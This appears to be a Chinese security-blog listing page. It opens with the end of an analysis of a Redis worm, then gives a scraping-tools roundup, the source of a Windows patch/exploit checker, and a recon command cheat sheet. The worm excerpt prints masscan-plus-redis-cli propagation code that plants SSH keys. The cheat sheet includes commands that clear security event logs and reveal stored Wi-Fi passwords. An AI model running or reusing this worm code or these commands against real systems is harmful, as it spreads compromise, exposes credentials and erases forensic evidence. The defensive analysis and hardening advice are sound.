'([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet sleep 1 masscan --max-rate 10000 -p6379,6380 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .lan sleep 60 rm -rf .dat .shard .ranges .lan 2>/dev/null 如果说前两个脚本只是在服务器上下载执行了二进制文件,那这个脚本才真正显示病毒的威力。下面就来分析这个脚本。 一开始的修改系统环境没什么好说的,接下来的写文件操作有点眼熟,如果用过redis的人,应该能猜到,这里是对redis进行配置。写这个配置,自然也就是利用了redis把缓存内容写入本地文件的漏洞,结果就是用本地的私钥去登陆被写入公钥的服务器了,无需密码就可以登陆,也就是我们文章最开始的/root/.ssh/authorized_keys。登录之后就开始定期执行计划任务,下载脚本。好了,配置文件准备好了,就开始利用masscan进行全网扫描redis服务器,寻找肉鸡,注意看这6379就是redis服务器的默认端口,如果你的redis的监听端口是公网IP或是0.0.0.0,并且没有密码保护,不好意思,你就中招了。 0x03 总结 通过依次分析这3个脚本,就能看出这个病毒的可怕之处,先是通过写入ssh public key 拿到登录权限,然后下载执行远程二进制文件,最后再通过redis漏洞复制,迅速在全网传播,以指数级速度增长。那么问题是,这台服务器是怎么中招的呢?看了下redis.conf,bind的地址是127.0.0.1,没啥问题。由此可以推断,应该是root帐号被暴力破解了,为了验证我的想法,我lastb看了一下,果然有大量的记录: 还剩最后一个问题,这个gpg-agentd程序到底是干什么的呢?我当时的第一个反应就是矿机,因为现在数字货币太火了,加大了分布式矿机的需求,也就催生了这条灰色产业链。于是,顺手把这个gpg-agentd拖到ida中,用string搜索bitcoin, eth, mine等相关单词,最终发现了这个:   打开nicehash.com看一下,一切都清晰了。 0x04 安全建议 一、服务器 1,禁用ROOT 2,用户名和密码尽量复杂 3,修改ssh的默认22端口 4,安装DenyHosts防暴力破解软件 5,禁用密码登录,使用RSA公钥登录 二、redis 1,禁用公网IP监听,包括0.0.0.0 2,使用密码限制访问redis 3,使用较低权限帐号运行redis   到此,整个入侵过程基本分析完了,如果大家对样本有兴趣,也可以自行去curl,或是去虚拟机执行上面的脚本。鉴于本人能力有限,文中难免会出现疏忽或是错误,还请大家多多指正。 ...

    2020-04-13 553
  • 不懂代码也能爬取数据?试试这几个工具

    前天,有个同学加我微信来咨询我: “毒蜂,我想抓取近期 5000 条新闻数据,但我是文科生,不会写代码,请问该怎么办?” 有问必答,毒蜂对于这位同学的问题,我给安排上。 先说说获取数据的方式:一是利用现成的工具,我们只需懂得如何使用工具就能获取数据,不需要关心工具是怎么实现。打个比方,假如我们在岸上,要去海上某个小岛,岸边有一艘船,我们第一想法是选择坐船过去,而不会想着自己来造一艘船再过去。 第二种是自己针对场景需求做些定制化工具,这就需要有点编程基础。举个例子,我们还是要到海上某个小岛,同时还要求在 30 分钟内将 1 顿货物送到岛上。 因此,前期只是单纯想获取数据,没有什么其他要求的话,优先选择现有工具。 可能是 Python 近来年很火,加上我们会经常看到别人用 Python 来制作网络爬虫抓取数据。从而有一些同学有这样的误区,想从网络上抓取数据就一定要学 Python,一定要去写代码。 其实不然,毒蜂介绍几个能快速获取网上数据的工具。 1.Microsoft Excel 你没有看错,就是 Office 三剑客之一的 Excel。Excel 是一个强大的工具,能抓取数据就是它的功能之一。我以耳机作为关键字,抓取京东的商品列表。 等待几秒后,Excel 会将页面上所有的文字信息抓取到表格中。这种方式确实能抓取到数据,但也会引入一些我们不需要的数据。如果你有更高的需求,可以选择后面几个工具。 2.火车头采集器 火车头是爬虫界的老品牌了,是目前使用人数最多的互联网数据抓取、处理、分析,挖掘软件。它的优势是采集不限网页,不限内容,同时还是分布式采集,效率会高一些。缺点是对小白用户不是很友好,有一定的知识门槛(了解如网页知识、HTTP 协议等方面知识),还需要花些时间熟悉工具操作。 因为有学习门槛,掌握该工具之后,采集数据上限会很高。有时间和精力的同学可以去折腾折腾。 官网地址:http://www.locoy.com/ 3.八爪鱼采集器 八爪鱼采集器是一款非常适合新手的采集器。它具有简单易用的特点,让你能几分钟中就快手上手。八爪鱼提供一些常见抓取网站的模板,使用模板就能快速抓取数据。如果想抓取没有模板的网站,官网也提供非常详细的图文教程和视频教程。 八爪鱼是基于浏览器内核实现可视化抓取数据,所以存在卡顿、采集数据慢的特点。但这瑕不掩瑜,能基本满足新手在短时间抓取数据的场景,比如翻页查询,Ajax 动态加载数据等。 网站:https://www.bazhuayu.com/ 4.GooSeeker 集搜客 集搜客也是一款容易上手的可视化采集数据工具。同样能抓取动态网页,也支持可以抓取手机网站上的数据,还支持抓取在指数图表上悬浮显示的数据。集搜客是以浏览器插件形式抓取数据。虽然具有前面所述的有点,但缺点也有,无法多线程采集数据,出现浏览器卡顿也在所难免。 网站:https://www.gooseeker.com/ 5.Scrapinghub 如果你想抓取国外的网站数据,可以考虑 Scrapinghub。Scrapinghub 是一个基于Python 的 Scrapy 框架的云爬虫平台。Scrapehub 算是市场上非常复杂和强大的网络抓取平台,提供数据抓取的解决方案商。 地址:https://scrapinghub.com/ 6.WebScraper WebScraper 是一款优秀国外的浏览器插件。同样也是一款适合新手抓取数据的可视化工具。我们通过简单设置一些抓取规则,剩下的就交给浏览器去工作。 地址:https://webscraper.io/ 如果你觉得文章不错的话,分享、收藏、在看是对猴哥的最大支持,是毒蜂持续创作的动力。 ...

    2020-04-12 673
  • Windows主机漏洞扫描工具

    0×00 说明: 这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。 本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长。 功能: 查找主机上具有的CVE 查找具有公开EXP的CVE 0×01 起因: 因为需要做一些主机漏洞扫描方面的工作,因而编写了这个简单的工具。之前也查找了几款类似的工具,如下: vulmap: vulmon开发的一款开源工具,原理是根据软件的名称和版本号来确定,是否有CVE及公开的EXP。这款Linux的工具挺好用,但是对于Windows系统层面不太适用。 windows-exp-suggester: 这款和本工具的原理一样,尝试使用了之后,发现它的CVEKB数据库只更新到2017年的,并且没有给出CVE是否有公开的EXP信息。 基于以上所以写了这个简单的工具,该项目在https://github.com/chroblert/WindowsVulnScan 0×02 原理: 1. 搜集CVE与KB的对应关系。首先在微软官网上收集CVE与KB对应的关系,然后存储进数据库中 2. 查找特定CVE网上是否有公开的EXP 3. 利用powershell脚本收集主机的一些系统版本与KB信息 4. 利用系统版本与KB信息搜寻主机上具有存在公开EXP的CVE 0×03 参数:  # author: JC0o0l  # GitHub: https://github.com/chroblert/  可选参数:    -h, --help           show this help message and exit    -u, --update-cve     更新CVEKB数据    -U, --update-exp     更新CVEEXP数据    -C, --check-EXP       检索具有EXP的CVE    -f FILE, --file FILE ps1脚本运行后产生的.json文件 0×04 示例: 1. 首先运行powershell脚本KBCollect.ps收集一些信息  .\KBCollect.ps1 2. 将运行后产生的KB.json文件移动到cve-check.py所在的目录 3. 安装一些python3模块  python3 -m pip install requirements.txt 4. 运行cve-check.py -u创建CVEKB数据库 5. 运行cve-check.py -U更新CVEKB数据库中的hasPOC字段 6. 运行cve-check.py -C -f KB.json查看具有公开EXP的CVE,如下: 0×05 源码: KBCollect.ps1:  function Get-CollectKB(){      # 1. 搜集所有的KB补丁      $KBArray = @()      $KBArray = Get-HotFix|ForEach-Object {$_.HotFixId}      $test = $KBArray|ConvertTo-Json      return $test  }  function Get-BasicInfo(){      # 1. 操作系统      # $windowsProductName = (Get-ComputerInfo).WindowsProductName      $windowsProductName = (Get-CimInstance Win32_OperatingSystem).Caption      # 2. 操作系统版本      $windowsVersion = (Get-ComputerInfo).WindowsVersion      $basicInfo = "{""windowsProductName"":""$windowsProductName"",""windowsVersion"":""$windowsVersion""}"      return $basicInfo        }  $basicInfo = Get-BasicInfo  $KBList = Get-CollectKB  $KBResult = "{""basicInfo"":$basicInfo,""KBList"":$KBList}"  $KBResult|Out-File KB.json -encoding utf8 cve-check.py:  import requests  import sqlite3  import json  import hashlib  import math  import re  import threading  import time  import argparse  from pathlib import Path  # 删除一些ssl 认证的warnging信息  requests.packages.urllib3.disable_warnings()    ThreadCount=20  DBFileName="CVEKB.db"  TableName="CVEKB"  insertSQL = []  updateSQL = []  lock = threading.Lock()  KBResult = {}  parser = argparse.ArgumentParser()  parser.add_argument("-u","--update-cve",help="更新CVEKB数据",action="store_true")  parser.add_argument("-U","--update-exp",help="更新CVEEXP数据",action="store_true")  parser.add_argument("-C","--check-EXP",help="检索具有EXP的CVE",action="store_true")  parser.add_argument("-f","--file",help="ps1脚本运行后产生的.json文件")  args = parser.parse_args()    class CVEScanThread(threading.Thread):      def __init__(self,func,args,name="",):          threading.Thread.__init__(self)          self.func = func          self.args = args          self.name = name          self.result = None        def run(self):          print("thread:{} :start scan page {}".format(self.args[1],self.args[0]))          self.result = self.func(self.args[0],)          print("thread:{} :stop scan page {}".format(self.args[1],self.args[0]))  class EXPScanThread(threading.Thread):      def __init__(self,func,args,name="",):          threading.Thread.__init__(self)          self.func = func          self.args = args          self.name = name          self.result = None        def run(self):          print("thread:{} :start scan CVE: {},xuehao:{}".format(self.args[1],self.args[0],self.args[2]))          self.result = self.func(self.args[0],)          print("thread:{} :stop scan CVE: {}".format(self.args[1],self.args[0]))      def get_result(self):          threading.Thread.join(self)          try:              return self.result          except Exception:              return "Error"  def get_page_num(num=1,pageSize=100):      url = "https://portal.msrc.microsoft.com/api/security-guidance/en-us"      payload = "{\"familyIds\":[],\"productIds\":[],\"severityIds\":[],\"impactIds\":[],\"pageNumber\":" + str(num) + ",\"pageSize\":" + str(pageSize) + ",\"includeCveNumber\":true,\"includeSeverity\":false,\"includeImpact\":false,\"orderBy\":\"publishedDate\",\"orderByMonthly\":\"releaseDate\",\"isDescending\":true,\"isDescendingMonthly\":true,\"queryText\":\"\",\"isSearch\":false,\"filterText\":\"\",\"fromPublishedDate\":\"01/01/1998\",\"toPublishedDate\":\"03/02/2020\"}"      headers = {          'origin': "https//portal.msrc.microsoft.com",          'referer': "https//portal.msrc.microsoft.com/en-us/security-guidance",          'accept-language': "zh-CN",          'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299",          'accept': "application/json, text/plain, */*",          'accept-encoding': "gzip, deflate",          'host': "portal.msrc.microsoft.com",          'connection': "close",          'cache-control': "no-cache",          'content-type': "application/json",         }        response = requests.request("POST", url, data=payload, headers=headers, verify = False)      resultCount = json.loads(response.text)['count']      return math.ceil(int(resultCount)/100)    def update_cvekb_database(num=1,pageSize=100):      pageCount = get_page_num()      #for i in range(1,pageCount+1):      i = 1      pageCount=524      tmpCount = ThreadCount      while i <= pageCount:          tmpCount = ThreadCount if (pageCount - i) >= ThreadCount else pageCount - i          print("i:{},pageCount-i:{},ThreadCount:{},PageCount:{}".format(i,pageCount-i,ThreadCount,pageCount))          time.sleep(0.5)              threads = []          print("===============================")          for j in range(1,tmpCount + 1):              print("更新第{}页".format(i+j-1))              t = CVEScanThread(update_onepage_cvedb_database,(i+j-1,j,),str(j))              threads.append(t)          for t in threads:              t.start()          for t in threads:              t.join()              # update_onepage_cvedb_database(num=i)          i = i + tmpCount          conn = sqlite3.connect(DBFileName)          for sql in insertSQL:              conn.execute(sql)          conn.commit()          conn.close()          if tmpCount != ThreadCount:              break                      def check_POC_every_CVE(CVEName=""):      #apiKey = ""      #url = "https://exploits.shodan.io/api/search?query=" + CVEName + "&key=" + apiKey      url = "https://exploits.shodan.io/?q=" + CVEName      try:          response = requests.request("GET",url=url,verify=False,timeout=10)          #total = json.loads(response.text)      except Exception as e:          print("Error,{}".format(CVEName))          print(e)          return "Error"      if "Total Results" not in response.text:          return "False"      else:          return "True"  def update_onepage_cvedb_database(num=1,pageSize=100):      url = "https://portal.msrc.microsoft.com/api/security-guidance/en-us"        payload = "{\"familyIds\":[],\"productIds\":[],\"severityIds\":[],\"impactIds\":[],\"pageNumber\":" + str(num) + ",\"pageSize\":" + str(pageSize) + ",\"includeCveNumber\":true,\"includeSeverity\":false,\"includeImpact\":false,\"orderBy\":\"publishedDate\",\"orderByMonthly\":\"releaseDate\",\"isDescending\":true,\"isDescendingMonthly\":true,\"queryText\":\"\",\"isSearch\":false,\"filterText\":\"\",\"fromPublishedDate\":\"01/01/1998\",\"toPublishedDate\":\"03/02/2020\"}"      headers = {          'origin': "https//portal.msrc.microsoft.com",          'referer': "https//portal.msrc.microsoft.com/en-us/security-guidance",          'accept-language': "zh-CN",          'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299",          'accept': "application/json, text/plain, */*",          'accept-encoding': "gzip, deflate",          'host': "portal.msrc.microsoft.com",          'connection': "close",          'cache-control': "no-cache",          'content-type': "application/json",         }      try:          response = requests.request("POST", url, data=payload, headers=headers, verify = False)          resultList = json.loads(response.text)['details']      except :          print(response.text)      conn = sqlite3.connect(DBFileName)      create_sql = """Create Table IF NOT EXISTS {} (         hash TEXT UNIQUE,         name TEXT,         KBName TEXT,         CVEName TEXT,         impact TEXT,         hasPOC TEXT)""".format(TableName)      conn.execute(create_sql)      conn.commit()      conn.close()      for result in resultList:          KBName = result['articleTitle1'] + ";" if (result['articleTitle1'] !=  None) and result['articleTitle1'].isdigit() else ""          KBName += result['articleTitle2'] + ";" if (result['articleTitle2'] != None) and result['articleTitle2'].isdigit() else ""          KBName += result['articleTitle3'] + ";" if (result['articleTitle3'] != None) and result['articleTitle3'].isdigit() else ""          KBName += result['articleTitle4'] + ";" if (result['articleTitle4'] != None) and result['articleTitle4'].isdigit() else ""          if KBName == "":              continue          h1 = hashlib.md5()          metaStr = result['name'] + KBName + result['cveNumber'] + result['impact']          h1.update(metaStr.encode('utf-8'))          #hasPOC = check_POC_every_CVE(result['cveNumber'])          # 收集到所有的KB后再搜索有没有公开的EXP          hasPOC = ""          sql = "INSERT OR IGNORE INTO "+TableName+" VALUES ('" + h1.hexdigest() + "','" + result['name'] + "','" + KBName + "','" + result['cveNumber'] + "','" + result['impact'] + "','" + hasPOC+"')"          with lock:              global insertSQL              insertSQL.append(sql)          # conn.execute(sql)      # conn.commit()      # conn.close()      # pass    def select_CVE(tmpList=[],windowsProductName="",windowsVersion=""):      conn = sqlite3.connect(DBFileName)      con = conn.cursor()      intersectionList = []      count = 0      for i in tmpList:          sql = 'select distinct(CVEName) from '+ TableName+' where (name like "'+ windowsProductName+'%'+ windowsVersion + '%") and ("'+ i +'" not in (select KBName from '+ TableName +' where name like "'+ windowsProductName+'%'+windowsVersion+'%")); '          cveList = []          for cve in con.execute(sql):              cveList.append(cve[0])          if count == 0:              intersectionList = cveList.copy()          count +=1          intersectionList = list(set(intersectionList).intersection(set(cveList)))      intersectionList.sort()      for cve in intersectionList:          sql = "select CVEName from {} where CVEName == '{}' and hasPOC == 'True'".format(TableName,cve)          # print(sql)          con.execute(sql)          if len(con.fetchall()) != 0:              print("{} has EXP".format(cve))      # print(intersectionList)  def update_hasPOC(key = "Empty"):      conn = sqlite3.connect(DBFileName)      con = conn.cursor()      if key == "All":          sql = "select distinct(CVEName) from {}".format(TableName)      else:          sql = "select distinct(CVEName) from {} where (hasPOC IS NULL) OR (hasPOC == '')".format(TableName)        con.execute(sql)      cveNameList = con.fetchall()      i = 0      count = 1      while i < len(cveNameList):          print("|=========={}============|".format(i))          # tmpCount = ThreadCount if (len(cveNameList) - i) >= ThreadCount else len(cveNameList) - i          # threads = []          # for j in range(1,tmpCount+1):          #     t = EXPScanThread(check_POC_every_CVE,(cveNameList[i+j][0],j,i+j,),str(j))          #     threads.append(t)          # for t in threads:          #     t.start()          # for t in threads:          #     t.join()          # j = 1          # for t in threads:          #     hasPOC = t.get_result()          #     print(hasPOC)          #     update_sql = "UPDATE "+TableName+" set hasPOC = '" + hasPOC + "' WHERE cveName == '" + cveNameList[i+j][0] +"';"          #     conn.execute(update_sql)          #     print("[+] update:{}".format(update_sql))          #     j += 1          # i=i+ThreadCount          # conn.commit()          hasPOC = check_POC_every_CVE(cveNameList[i][0])          time.sleep(0.3)          update_sql = "UPDATE "+TableName+" set hasPOC = '" + hasPOC + "' WHERE cveName == '" + cveNameList[i][0] +"';"          conn.execute(update_sql)          print(update_sql)          count += 1          i += 1          if count == 10:              conn.commit()              print("[+]update")              count = 1      conn.commit()      conn.close()      print("Over")      if __name__ == "__main__":      banner = """     ========CVE-EXP-Check===============     |       author:JC0o0l               |     |       wechat:JC_SecNotes         |     |       version:1.0                 |     =====================================     """      print(banner)      if (not args.check_EXP ) and (not args.update_cve) and (not args.update_exp) and args.file is None:          parser.print_help()      if args.update_cve:          update_cvekb_database()      if args.update_exp:          dbfile=Path(DBFileName)          if dbfile.exists():              update_hasPOC(key="Empty")          else:              print("请先使用-u 创建数据库")              parser.print_help()      if args.check_EXP:          dbfile=Path(DBFileName)          if not dbfile.exists():              print("请先使用-u 创建数据库,之后使用 -U 更新是否有EXP")              parser.print_help()              exit()          if args.file:              with open(args.file,"r",encoding="utf-8") as f:                  KBResult = json.load(f)              windowsProductName = KBResult['basicInfo']['windowsProductName']              windowsProductName = ((re.search("\w[\w|\s]+\d+[\s|$]",windowsProductName).group()).strip()).replace("Microsoft","").strip()              windowsVersion = KBResult['basicInfo']['windowsVersion']              print("系统信息如下:")              print("{} {}".format(windowsProductName,windowsVersion))              tmpKBList = KBResult['KBList']              KBList = []              for KB in tmpKBList:                  KBList.append(KB.replace("KB",""))              print("KB信息如下:")              print(KBList)              print("EXP信息如下:")              select_CVE(tmpList=KBList,windowsProductName=windowsProductName,windowsVersion=windowsVersion)          else:              print("请输入.json文件")  ...

    2020-04-12 636
  • 命令行下的信息搜集

    使用wmic识别安装到系统中的补丁情况 C:\> wmic qfe get description,installedOn 识别正在运行的服务 C:\>sc query type= service C:\>net start 识别开机启动的程序,包括路径 C:\>wmic startup list full ping探测存活主机 D:\>for /L %I in (100,1,254) DO @ping -w 1 -n 1 10.18.180.%I | findstr "TTL=" >> pinglive.txt 查看系统中网卡的IP地址和MAC地址 D:\>wmic nicconfig get ipaddress,macaddress 查看当前系统是否有屏保保护,延迟是多少 D:\>wmic desktop get screensaversecure,screensavertimeout 查看系统中开放的共享 D:\>wmic share get name,path D:\>net share 查看系统中开启的日志 C:\>wmic nteventlog get path,filename,writeable 清除相关的日志(这里是全部清除) wevtutil cl "windows powershell" wevtutil cl "security" wevtutil cl "system" 查看系统中安装的软件以及版本 C:\>wmic product get name,version 查看某个进程的详细信息 (路径,命令行参数等) C:\>wmic process where name="chrome.exe" list full 终止一个进程 D:\>wmic process where name="xshell.exe" call terminate D:\>ntsd -c q -p 进程的PID 显示系统中的曾经连接过的无线密码 D:\>netsh wlan show profiles D:\>netsh wlan show profiles name="profiles的名字" key=clear 查看当前系统是否是VMWARE C:\>wmic bios list full | find /i "vmware" ...

    2020-04-12 587

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:9:00-23:00,节假日休息

扫码关注